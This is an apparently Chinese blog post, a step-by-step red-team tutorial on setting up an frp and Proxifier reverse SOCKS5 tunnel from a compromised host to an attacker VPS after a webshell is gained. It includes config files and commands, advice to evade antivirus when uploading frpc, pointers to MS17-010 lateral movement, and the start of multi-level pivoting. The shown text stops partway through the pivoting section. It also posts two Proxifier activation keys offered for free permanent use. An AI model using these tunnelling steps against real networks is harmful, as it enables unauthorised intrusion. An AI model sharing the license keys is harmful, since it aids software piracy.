

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="b11c">
  <meta name="keywords" content="">
  
    <meta name="description" content="​                                            《  实战下—Frp+Proxifier内网穿透工具搭建与使用的保姆级教程  》  一. 前言当我们通过web打点、钓鱼等手法get webshell之后，需要将目标主机的流量代理回来到我们本地主机，使用目标主机的流量进行内网渗透操作时——要使用到“内网穿透工具”。 本篇的小Tips的目的：是为了方便大家了">
<meta property="og:type" content="article">
<meta property="og:title" content="实战下—Frp+Proxifier内网穿透工具搭建与使用的保姆级教程">
<meta property="og:url" content="https://b11c.github.io/2023/06/11/frp/index.html">
<meta property="og:site_name" content="b11c">
<meta property="og:description" content="​                                            《  实战下—Frp+Proxifier内网穿透工具搭建与使用的保姆级教程  》  一. 前言当我们通过web打点、钓鱼等手法get webshell之后，需要将目标主机的流量代理回来到我们本地主机，使用目标主机的流量进行内网渗透操作时——要使用到“内网穿透工具”。 本篇的小Tips的目的：是为了方便大家了">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://b11c.github.io/2023/06/11/frp/1.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/11/frp/2.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/11/frp/3.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/11/frp/4.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/11/frp/5.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/11/frp/6.png">
<meta property="og:image" content="https://b11c.github.io/2023/06/11/frp/7.1.png">
<meta property="article:published_time" content="2023-06-10T16:13:20.000Z">
<meta property="article:modified_time" content="2023-06-11T01:04:00.560Z">
<meta property="article:author" content="b11c">
<meta property="article:tag" content="内网">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://b11c.github.io/2023/06/11/frp/1.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>实战下—Frp+Proxifier内网穿透工具搭建与使用的保姆级教程 - b11c</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"b11c.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"left","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  

  

  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>b11c</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="实战下—Frp+Proxifier内网穿透工具搭建与使用的保姆级教程"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        b11c
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-06-11 00:13" pubdate>
          June 11, 2023 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          7.6k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          64 mins
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span>次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="padding-left: 2rem; margin-right: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">实战下—Frp+Proxifier内网穿透工具搭建与使用的保姆级教程</h1>
            
            
              <div class="markdown-body">
                
                <hr>
<p>​                                            <strong>《  实战下—Frp+Proxifier内网穿透工具搭建与使用的保姆级教程  》</strong></p>
<hr>
<h2 id="一-前言"><a href="#一-前言" class="headerlink" title="一. 前言"></a>一. 前言</h2><p>当我们通过web打点、钓鱼等手法<strong>get webshell</strong>之后，需要将目标主机的流量代理回来到我们本地主机，使用目标主机的流量进行内网渗透操作时——要使用到“<strong>内网穿透工具</strong>”。</p>
<p>本篇的小Tips的目的：是为了方便大家了解内网穿透搭建和基本使用的手法。</p>
<h2 id="二-环境"><a href="#二-环境" class="headerlink" title="二. 环境"></a>二. 环境</h2><figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs scss">VPS：ubuntu  <br>(不建议购买Windows操作，windows操作系统的安全性比别的操作系统低，行业内的比较少使用，除非特殊需求)<br></code></pre></td></tr></table></figure>

<h2 id="三-Frp-Proxifier-内网穿透搭建和使用"><a href="#三-Frp-Proxifier-内网穿透搭建和使用" class="headerlink" title="三. Frp+Proxifier 内网穿透搭建和使用"></a>三. Frp+Proxifier 内网穿透搭建和使用</h2><p> 一般提到内网穿透，最经典的就是frp工具，基本打过内网，都会优先考虑使用这款工具。</p>
<h3 id="1-FRP-Proxifier介绍"><a href="#1-FRP-Proxifier介绍" class="headerlink" title="1.FRP+Proxifier介绍"></a>1.FRP+Proxifier介绍</h3><p><strong>Frp</strong> 采用 C&#x2F;S 模式（具有客户端&#x2F;服务器端），将<strong>服务端</strong>部署在具有公网 IP 的机器上（vps服务器上），<strong>客户端</strong>部署在内网或防火墙内的机器上，通过访问暴露在服务器上的端口，反向代理到处于内网的服务。 在此基础上，frp 支持 TCP, UDP, HTTP, HTTPS 等多种协议，提供了加密、压缩，身份认证，代理限速，负载均衡等众多能力。</p>
<p><strong>Proxifier</strong>是一款功能非常强大的socks5客户端，可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。</p>
<p>通俗易懂的理解：就是利用frp和proxifier优秀的特点组建出一个优秀的内网穿透工具。</p>
<h3 id="2-搭建和使用"><a href="#2-搭建和使用" class="headerlink" title="2.搭建和使用"></a>2.搭建和使用</h3><h4 id="A-github下载frp"><a href="#A-github下载frp" class="headerlink" title="A.  github下载frp"></a>A.  github下载frp</h4><p>frp分为：服务端（frps）和客户端（frpc），无论是服务端还是客户端的使用命令都是一样的。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">下载地址：https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/fatedier/</span>frp<span class="hljs-regexp">/releases/</span>tag/v0.<span class="hljs-number">49.0</span><br><br>这里需要下两个版本的frp（windows和Linux版本），购买的VPS是Linux操作系统，只需要frp的Linux版本中的服务端（frps和相关的frps文件）；我们的本地主机是windows操作，需要frp的windows版本中的客户端（frpc）进行连接。<br></code></pre></td></tr></table></figure>

<p>VPS上查看内核版本号：</p>
<blockquote>
<p>cat &#x2F;proc&#x2F;version    &#x2F;&#x2F;选择对应的操作系统，不然报错</p>
</blockquote>
<h4 id="B-FRP服务端（frps）在VPS上的操作："><a href="#B-FRP服务端（frps）在VPS上的操作：" class="headerlink" title="B.  FRP服务端（frps）在VPS上的操作："></a>B.  FRP服务端（frps）在VPS上的操作：</h4><h5 id="（1）VPS上新建frp文件夹（mkdir-frp）"><a href="#（1）VPS上新建frp文件夹（mkdir-frp）" class="headerlink" title="（1）VPS上新建frp文件夹（mkdir frp）"></a>（1）VPS上新建frp文件夹（mkdir frp）</h5><p>将frps服务器端的相关文件上传到frp文件中，记得只需三个文件：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc">frps、frps.ini、frps<span class="hljs-emphasis">_full.ini(实战下基本不用这个文件)</span><br><span class="hljs-emphasis">分析：</span><br><span class="hljs-emphasis">frps是服务器</span><br><span class="hljs-emphasis">frps.ini是frps的配置文件</span><br><span class="hljs-emphasis">frps_</span>full.ini是frp是所有相关的配置参考，可能不同的场景的需求不同，我们就可以快速查阅并修改frps.ini<br></code></pre></td></tr></table></figure>
<img src="/2023/06/11/frp/1.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<h5 id="（2）VPS上修改配置文件—frps-ini"><a href="#（2）VPS上修改配置文件—frps-ini" class="headerlink" title="（2）VPS上修改配置文件—frps.ini"></a>（2）VPS上修改配置文件—frps.ini</h5><p>修改frps.ini文件，为如下：</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs makefile">[common]<br>bind_addr = 0.0.0.0   <span class="hljs-comment">#服务端监听地址，默认0.0.0.0</span><br>bind_port = 7000    <span class="hljs-comment">#服务端监听端口</span><br>token = 123456      <span class="hljs-comment">#验证作用</span><br>dashboard_port = 7500  <span class="hljs-comment">#状态以及代理统计信息展示,vpsip:7500可查看详情</span><br>dashboard_user = admin     <span class="hljs-comment">#访问用户</span><br>dashboard_pwd = password    <span class="hljs-comment">#dashboard_pwd访问密码</span><br>log_file = ./frps.log    <span class="hljs-comment">#log_file日志文件</span><br><br>log_level = info    <span class="hljs-comment">#log_level记录的日志级别</span><br>log_max_days = 3     <span class="hljs-comment">#log_max_days日志留存3天</span><br>authentication_timeout = 0     <span class="hljs-comment">#authentication_timeout超时时间</span><br><span class="hljs-comment">#max_pool_count最大链接池,每个代理预先与后端服务器建立起指定数量的最大链接数</span><br><br>max_pool_count = 50<br>allow_ports = 40000-50000  <span class="hljs-comment">#允许代理绑定的服务端端口</span><br><br>分析：<br>frps.ini中最重要的 bind_port、token，一般真实场景考虑使用原生态的，不需要配置这么多，最多加个域名和保存日志信息。<br></code></pre></td></tr></table></figure>

<p>保存，到这里vps上的配置文件frps.ini就配置好了。</p>
<p><strong>还可以简化到：</strong>（建议使用简化版）</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-section">[common]</span><br><span class="hljs-attr">bind_port</span> = <span class="hljs-number">7000</span>    <span class="hljs-comment">#服务端监听端口</span><br><span class="hljs-attr">token</span> = <span class="hljs-number">123456</span>      <span class="hljs-comment">#验证作用</span><br><span class="hljs-attr">log_file</span> = ./frps.log    <span class="hljs-comment">#log_file日志文件</span><br><span class="hljs-attr">log_level</span> = info    <span class="hljs-comment">#log_level记录的日志级别</span><br><span class="hljs-attr">log_max_days</span> = <span class="hljs-number">3</span>     <span class="hljs-comment">#log_max_days日志留存3天</span><br></code></pre></td></tr></table></figure>

<h5 id="（3）VPS启动frp服务器端"><a href="#（3）VPS启动frp服务器端" class="headerlink" title="（3）VPS启动frp服务器端"></a>（3）VPS启动frp服务器端</h5><p>不管是服务端（frps）和客户端（frpc），启动的命令都是差不多的，启动frps服务端：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">./frps -c frps.ini    //frps服务器端启动<br></code></pre></td></tr></table></figure>

<p>结果：</p>
<img src="/2023/06/11/frp/2.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash">环境需求在服务器上长期运行，加入到后台进程当中：<br><span class="hljs-built_in">nohup</span> ./frps -c frps.ini &amp;   //在后台运行<br><br>如何关闭后台运行：<br>Ctrl+C 关闭<span class="hljs-built_in">nohup</span>，frps依旧会在后台运行，<br>使用<span class="hljs-built_in">jobs</span>命令查看后台运行的程序。<br></code></pre></td></tr></table></figure>

<h4 id="C-FRP客户端（frps）在windows（我们本地主机）上测试操作："><a href="#C-FRP客户端（frps）在windows（我们本地主机）上测试操作：" class="headerlink" title="C.  FRP客户端（frps）在windows（我们本地主机）上测试操作："></a>C.  FRP客户端（frps）在windows（我们本地主机）上测试操作：</h4><p>​      在我们本地主机搭建并配置好frp客户端，进行上线测试的<strong>目的</strong>：为了运用保证实战下，不会出错，在本地主机进行测试是否能正常上线。</p>
<h5 id="（1）wiindows客户端上修改配置文件—frpc-ini"><a href="#（1）wiindows客户端上修改配置文件—frpc-ini" class="headerlink" title="（1）wiindows客户端上修改配置文件—frpc.ini"></a>（1）wiindows客户端上修改配置文件—frpc.ini</h5><p>修改frpc.ini文件，为如下：</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-section">[common]</span><br><span class="hljs-attr">server_addr</span> = vps的ip地址     <span class="hljs-comment">#连接服务端的地址</span><br><span class="hljs-attr">server_port</span> = <span class="hljs-number">7000</span>     <span class="hljs-comment">#连接服务端的端口</span><br><span class="hljs-attr">tls_enable</span> = ture      <span class="hljs-comment">#启用 TLS 协议加密连接</span><br><span class="hljs-attr">pool_count</span> = <span class="hljs-number">5</span>    <span class="hljs-comment">#连接池大小</span><br><br><span class="hljs-section">[plugin_socks]</span><br><span class="hljs-attr">type</span> = tcp<br><span class="hljs-attr">remote_port</span> = <span class="hljs-number">46075</span><br><span class="hljs-attr">plugin</span> = socks5<br><span class="hljs-attr">plugin_user</span> = admin<br><span class="hljs-attr">plugin_passwd</span> = admin123<br><span class="hljs-attr">use_encryption</span> = <span class="hljs-literal">true</span><br><span class="hljs-attr">use_compression</span> = <span class="hljs-literal">true</span><br></code></pre></td></tr></table></figure>

<p>保存，windows客户端上的配置文件frpc.ini配置完成。</p>
<p><strong>还可以简化到：</strong>（建议使用简化版）</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-section">[common]</span><br><span class="hljs-attr">server_addr</span> = vps的ip地址      <span class="hljs-comment">#连接服务端的地址</span><br><span class="hljs-attr">server_port</span> = <span class="hljs-number">7000</span>            <span class="hljs-comment">#连接服务端的端口</span><br><span class="hljs-attr">token</span> = <span class="hljs-number">123456</span><br><span class="hljs-attr">tls_enable</span> = <span class="hljs-literal">true</span>             <span class="hljs-comment">#启用TLS协议加密连接</span><br><br><span class="hljs-section">[socks5]</span><br><span class="hljs-attr">type</span> = tcp<br><span class="hljs-attr">remote_port</span> = <span class="hljs-number">7001</span><br><span class="hljs-attr">plugin</span> = socks5<br><br><span class="hljs-comment">#frp代理走的协议还有别的，比较经典是socks协议，如想研究别的协议可以看frpc_full.ini文件，里面有很详细的说明。</span><br></code></pre></td></tr></table></figure>

<h5 id="（2）windows本机启动frp客户端"><a href="#（2）windows本机启动frp客户端" class="headerlink" title="（2）windows本机启动frp客户端"></a>（2）windows本机启动frp客户端</h5><p>启动命令：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">frpc<span class="hljs-selector-class">.exe</span> -c frpc<span class="hljs-selector-class">.ini</span>    <span class="hljs-comment">//frpc客户端启动</span><br></code></pre></td></tr></table></figure>

<p>结果：能正常上线，没问题</p>
<img src="/2023/06/11/frp/3.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs stylus">环境需求在服务器上长期运行，加入到后台进程当中：<br>nohup frpc<span class="hljs-selector-class">.exe</span> -c frpc<span class="hljs-selector-class">.ini</span> &amp;   <span class="hljs-comment">//在后台运行</span><br></code></pre></td></tr></table></figure>

<p>到这里，frp的服务端（frps）和客户端（frpc）都已经配置完成，并能正常运行，剩下就是在实战中将frp客户端的(frpc.exe和frpc.ini)上传到目标主机上和proxifier的组合使用，将目标主机的内网流量代理回到攻击主机上。</p>
<h4 id="D-配置Proxifier代理工具"><a href="#D-配置Proxifier代理工具" class="headerlink" title="D.配置Proxifier代理工具"></a>D.配置Proxifier代理工具</h4><p>Proxifier的配置是在我们windows本地主机上配置的（也就是在我们frp客户端的这台主机上配置），下载proxifier并安装。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs awk">下载地址：https:<span class="hljs-regexp">//</span>www.proxifier.com<span class="hljs-regexp">/download/</span><br>激活码：<br><span class="hljs-number">5</span>EZ8G-C3WL5-B56YG-SCXM9-<span class="hljs-number">6</span>QZAP<br>YTZGN-FYT53-J253L-ZQZS4-YLBN9<br>安装好proxifier后，填入激活码，获得永久使用权。<br></code></pre></td></tr></table></figure>

<h5 id="（1）配置proxifier"><a href="#（1）配置proxifier" class="headerlink" title="（1）配置proxifier"></a>（1）配置proxifier</h5><p>点击” proxifier —&gt;Proxy Server —&gt;add —&gt;添加vps的ip、端口、走的协议“，frp的客户端frpc.ini中的配置是走socks 5协议，remote_port端口是7001，所以要配置一样。</p>
<p>（ps：配置的信息要和frp客户端的frpc.ini一样，否则出错）</p>
<img src="/2023/06/11/frp/4.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<p>再次，proxifier —&gt;Proxy Server 查看是否添加成功。</p>
<h5 id="（2）运行proxifier进行代理"><a href="#（2）运行proxifier进行代理" class="headerlink" title="（2）运行proxifier进行代理"></a>（2）运行proxifier进行代理</h5><p>VPS上运行frp服务器端（frps），运行Proxifier之后，当目标主机还没有执行”frpc.exe -c frpc.ini“时，proxifier上回显是我们主机上的软件请求运行的情况，但都是无法建立请求。</p>
<img src="/2023/06/11/frp/5.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<h4 id="E-将目标主机的流量代理回来（被进攻的主机）"><a href="#E-将目标主机的流量代理回来（被进攻的主机）" class="headerlink" title="E. 将目标主机的流量代理回来（被进攻的主机）"></a>E. 将目标主机的流量代理回来（被进攻的主机）</h4><p>​    这里演示环境的目标主机是Windows操作系统。</p>
<h5 id="（1）向目标主机上传frp客户端（frpc-exe）和frpc-ini"><a href="#（1）向目标主机上传frp客户端（frpc-exe）和frpc-ini" class="headerlink" title="（1）向目标主机上传frp客户端（frpc.exe）和frpc.ini"></a>（1）向目标主机上传frp客户端（frpc.exe）和frpc.ini</h5><p>这里的目标主机是windows操作系统就上传相对应的版本，Linux操作系统就上传Linux的frp的客户端。</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs stylus">上传到目标主机是两个文件:frpc.exe/frpc和 frpc<span class="hljs-selector-class">.ini</span><br>如目标主机是：<br>windows：frpc<span class="hljs-selector-class">.exe</span> 和 frpc<span class="hljs-selector-class">.ini</span><br>linux: frpc 和 frpc.ini<br></code></pre></td></tr></table></figure>

<p>将这两个文件上传到目标主机，注意：frp的特征太明显了，直接上传肯定要被杀，要考虑杀软的情况和免杀的问题。</p>
<h5 id="（2）目标主机执行frpc-exe"><a href="#（2）目标主机执行frpc-exe" class="headerlink" title="（2）目标主机执行frpc.exe"></a>（2）目标主机执行frpc.exe</h5><p>执行：</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs llvm">frpc.exe -<span class="hljs-keyword">c</span> frpc.ini<br></code></pre></td></tr></table></figure>

<p>查看proxifier代理结果：</p>
<img src="/2023/06/11/frp/6.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<p>已经成功将目标主机的流量代理回来，剩下就是内网渗透了，对目标主机进行信息收集，查看与当前主机已经建立通信联系的段，对某个段进行扫描，如果存在域环境，利用ladon扫描存活主机，看看有没有ms17010等漏洞利用，扩大战果。</p>
<h3 id="3-高级用法："><a href="#3-高级用法：" class="headerlink" title="3.高级用法："></a>3.高级用法：</h3><p>基于大型内网结构下<strong>多级内网隧道穿透</strong>的使用，会遇到目标内网的某台主机不出网情况，需要将其流量代理回来的需求。</p>
<p>下面根据一个案例的内网结构图，分为 <strong>一、二、三级内网网络环境</strong>部署frp内网隧道穿透的使用：</p>
<img src="/2023/06/11/frp/7.1.png" srcset="/img/loading.gif" lazyload class="" title="This is an example image">

<h4 id="1-一级内网网络环境"><a href="#1-一级内网网络环境" class="headerlink" title="1. 一级内网网络环境"></a>1. 一级内网网络环境</h4><h5 id="环境："><a href="#环境：" class="headerlink" title="环境："></a>环境：</h5><p>A：VPS服务器（frp服务器端）：163.20.10.25<br>B：子域用户（win 7 -web服务器）：192.168.250.25和10.10.3.100</p>
<h5 id="（1）frps服务器端："><a href="#（1）frps服务器端：" class="headerlink" title="（1）frps服务器端："></a>（1）frps服务器端：</h5><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs makefile">[common]<br>bind_addr = 0.0.0.0<br>bind_port = 7000    <span class="hljs-comment">#服务端监听端口</span><br>token = 123456      <span class="hljs-comment">#验证作用</span><br><br>./frps -c frps.ini  //运行命令<br></code></pre></td></tr></table></figure>

<h5 id="（2）frpc客户端："><a href="#（2）frpc客户端：" class="headerlink" title="（2）frpc客户端："></a>（2）frpc客户端：</h5><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs makefile">[common]<br>server_addr = 163.20.10.25      <span class="hljs-comment">#连接VPS的ip地址</span><br>server_port = 7000            <span class="hljs-comment">#连接服务端的端口</span><br>token = 123456<br>tls_enable = true             <span class="hljs-comment">#启用TLS协议加密连接</span><br><br>[socks5]<br>type = tcp<br>remote_port = 7001<br>plugin = socks5<br><br>frpc.exe -c frpc.ini    //运行命令<br></code></pre></td></tr></table></figure>

<h5 id="（3）proxifier配置："><a href="#（3）proxifier配置：" class="headerlink" title="（3）proxifier配置："></a>（3）proxifier配置：</h5><figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs accesslog"><span class="hljs-number">163.20.10.25</span>    <span class="hljs-number">7002</span>  socks5<br></code></pre></td></tr></table></figure>

<h4 id="2-二级内网网络环境"><a href="#2-二级内网网络环境" class="headerlink" title="2. 二级内网网络环境"></a>2. 二级内网网络环境</h4><h5 id="环境：-1"><a href="#环境：-1" class="headerlink" title="环境："></a>环境：</h5><p>A：VPS服务器（frp服务器端）：163.20.10.25<br>B：子域用户（win 7 -web服务器）：192.168.250.25 和 10.10.3.100<br>C：子域控制器（win server 2016）：10.10.3.6 和 10.10.20.0&#x2F;24</p>
<p>PS：内网C主机不能直接连接VPS，可以连接内网B主机，B主机可以直接连接VPS，所以通过B作为跳板，将socks代理建设在内网C主机中后！</p>
<h5 id="（1）VPS上frp服务器端配置："><a href="#（1）VPS上frp服务器端配置：" class="headerlink" title="（1）VPS上frp服务器端配置："></a>（1）VPS上frp服务器端配置：</h5><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs makefile"><span class="hljs-comment"># frps.ini</span><br>[common]<br>bind_addr = 0.0.0.0<br>bind_port = 7000     <span class="hljs-comment">#服务端监听端口</span><br>token = 123456       <span class="hljs-comment">#验证作用</span><br><br>./frps -c frps.ini   <span class="hljs-comment">#运行命令</span><br></code></pre></td></tr></table></figure>

